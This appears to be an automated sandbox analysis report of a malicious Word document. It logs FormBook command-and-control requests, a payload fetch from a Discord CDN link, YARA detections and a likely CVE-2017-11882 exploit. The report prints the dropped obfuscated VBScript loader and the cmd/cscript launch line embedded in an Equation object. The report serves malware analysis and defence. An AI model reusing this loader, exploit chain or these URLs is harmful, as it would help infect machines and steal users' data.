          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: global trafficHTTP traffic detected: GET /t3t2/?s2MDa=cHQmaRhXG/vngEByS69ZQUNH+JDmxyaQFA1QwuukQiJPteqD3aI5HBNhKJ+idn/6LHxDHg==&aJ=btx8n42x9 HTTP/1.1Host: www.vecydoy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t3t2/?s2MDa=3Qj9oZZfewD59ZVrWkdF2G2Wunuif2Jlkx5S2y1tDqrPnVj26TOdvUTbk2/4ZHnYpFjC/w==&aJ=btx8n42x9 HTTP/1.1Host: www.marcasemele.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t3t2/?s2MDa=Y2xcL3ZkL7oVFMSzs9YHectEjMd2sfTUB3/xlHaDCcg2Dqhlo8BobNvGWm7cW+r/txQJ1w==&aJ=btx8n42x9 HTTP/1.1Host: www.lillianpsmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /attachments/915347845752705109/915799800740462662/mono.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: WIX_COMIL WIX_COMIL
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
          Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
          Source: explorer.exe, 0000000B.00000000.489922157.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 0000000B.00000000.479348436.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000B.00000000.479348436.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: WINWORD.EXE, 00000000.00000002.568839221.00000000077BE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
          Source: WINWORD.EXE, 00000000.00000002.568839221.00000000077BE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
          Source: WINWORD.EXE, 00000000.00000002.566495233.0000000004320000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.478361676.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: cscript.exe, 00000004.00000002.412949970.0000000001C40000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.480030722.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000B.00000000.479348436.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000B.00000000.480398853.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.499613113.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540511030.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 0000000B.00000000.484058899.0000000008412000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.icoosL
          Source: explorer.exe, 0000000B.00000000.481335940.00000000045CF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.484058899.0000000008412000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 0000000B.00000000.491997913.0000000008412000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.484058899.0000000008412000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico78
          Source: explorer.exe, 0000000B.00000000.489922157.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000B.00000000.489922157.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 0000000B.00000000.479348436.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: WINWORD.EXE, 00000000.00000002.566495233.0000000004320000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.478361676.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 0000000B.00000000.489922157.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000B.00000000.479348436.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000B.00000000.489922157.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 0000000B.00000000.479986148.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 0000000B.00000000.499778084.0000000004513000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540627935.0000000004513000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.489277123.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpo
          Source: explorer.exe, 0000000B.00000000.501190404.000000000839F000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 0000000B.00000000.488949395.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540459698.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.499591438.000000000447A000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpZ
          Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000B.00000000.499778084.0000000004513000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.484075172.0000000008424000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540627935.0000000004513000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.501268068.0000000008424000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.481527230.000000000460B000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540867844.000000000460B000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.489277123.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000B.00000000.484075172.0000000008424000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.501268068.0000000008424000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.481527230.000000000460B000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540867844.000000000460B000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000B.00000000.496932161.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 0000000B.00000000.483961784.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.481527230.000000000460B000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.542438433.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540867844.000000000460B000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 0000000B.00000000.483961784.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.542438433.0000000008374000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1)
          Source: explorer.exe, 0000000B.00000000.481335940.00000000045CF000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F053B286-DC2A-4E74-A6C1-CD6052CFBDE3}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: google.com
          Source: global trafficHTTP traffic detected: GET /attachments/915347845752705109/915799800740462662/mono.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /t3t2/?s2MDa=cHQmaRhXG/vngEByS69ZQUNH+JDmxyaQFA1QwuukQiJPteqD3aI5HBNhKJ+idn/6LHxDHg==&aJ=btx8n42x9 HTTP/1.1Host: www.vecydoy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t3t2/?s2MDa=3Qj9oZZfewD59ZVrWkdF2G2Wunuif2Jlkx5S2y1tDqrPnVj26TOdvUTbk2/4ZHnYpFjC/w==&aJ=btx8n42x9 HTTP/1.1Host: www.marcasemele.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t3t2/?s2MDa=Y2xcL3ZkL7oVFMSzs9YHectEjMd2sfTUB3/xlHaDCcg2Dqhlo8BobNvGWm7cW+r/txQJ1w==&aJ=btx8n42x9 HTTP/1.1Host: www.lillianpsmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
          Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Dec 2021 20:49:15 GMTServer: ApacheX-Powered-By: PHP/7.4.23Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.lillianpsmith.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 37 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 43 6c 6f 74 68 69 6e 67 20 26 61 6d 70 3b 20 43 72 61 66 74 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 6f 74 68 69 6e 67 20 26 61 6d 70 3b 20 43 72 61 66 74 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 6c 6c 69 61 6e 70 73 6d 69 74 68 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 6f 74 68 69 6e 67 20 26 61 6d 70 3b 20 43 72 61 66 74 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 6c 6c 69 61 6e 70 73 6d 69 74 68 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5
          Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49167 version: TLS 1.2
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Document contains OLE streams which likely are hidden ActiveX objectsShow sources
          Source: ~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp.0.drStream path '_1699986730/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Pat
          Malicious sample detected (through community Yara rule)Show sources
          Source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
          Document contains OLE streams with names of living off the land binariesShow sources
          Source: ~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp.0.drStream path '_1699986730/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Path\Client.vbs.. ..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..F0xCRC341414141 = E0xCRC341414141( Join (TristateUseDefault0xCRC341414141,""))..End Function........Function G0xCRC341414141()..G0xCRC341414141 = "\toor\.\\!}etanosrepmi=leveL"..End Function........Function H0xCRC341414141()..H0xCRC341414141 = "noitanosrepmi{:stmgmniw"..End Function........Function I0xCRC341414141()..I0xCRC341414141 = E0xCRC341414141 ("putratSssecorP_23niW")..End Function........Function J0xCRC341414141()..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..J0xCRC341414141 = "hsre"..End Function........D0xCRC341414141()........Function E0xCRC341414141(str)..If Left(g_DumpDir,2) <> "\\" Then..DriveName = Left(g_DumpDir,1)..Else..strAux = Right(g_DumpDir, Len(g_DumpDir) - 2)..arrAux = Split(strAux, "\", -1) ..DriveName = "\\" & arrAux(0) & "\" & arrAux(1)..End If..Length = 8..objArgs = 5..If Length = objArgs Then..Else..GetStringArray = Len(str)..a = Left(str,1)..For i = 1 To GetStringArray..arrStrings = Eval("Lef" + "t(s" + "tr,i)")..If Len(arrStrings)> 1 Then..strSeparator = Right(arrStrings,1) & strTemp..strTemp = strSeparator ..End If..Next..E0xCRC341414141 = strTemp & a..End If..End Function........Sub B0xCRC341414141(CO0xCRC341414141)..Set ProductData0xCRC341414141 = GetObject (SPLevel0xCRC341414141 + "CiMv2")..Set ConvertToKey0xCRC341414141 = ProductData0xCRC341414141.Get (I0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Set KeyOffset0xCRC341414141 = ConvertToKey0xCRC341414141.SpawnInstance_..KeyOffset0xCRC341414141.ShowWindow = 0..Execute("SeT Data0xCRC341414141 = ProductData0xCRC341414141.Get (""WiN32_PrOceSs"")")..Set isWin80xCRC341414141 = Da
          Source: ~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp.0.drStream path '_1699986732/Equation Native' : ..................\...[.............ZZCmD.exe /C cscript %tmp%\Client.vbs A..C................................................................................................................
          Very long command line foundShow sources
          Source: unknownProcess created: Commandline size = 4039
          Microsoft Office drops suspicious filesShow sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.vbsJump to behavior
          Found suspicious RTF objectsShow sources
          Source: Client.vbsStatic RTF information: Object: 0 Offset: 000011FEh Client.vbs
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00401030
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041DA19
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041E23C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041EB64
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041DCEB
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00402D90
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041D5A6
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00409E60
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041DE6B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041EE96
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041DFEA
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00402FB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041E7B4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A2E0C6
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A5D005
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A33040
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A4905A
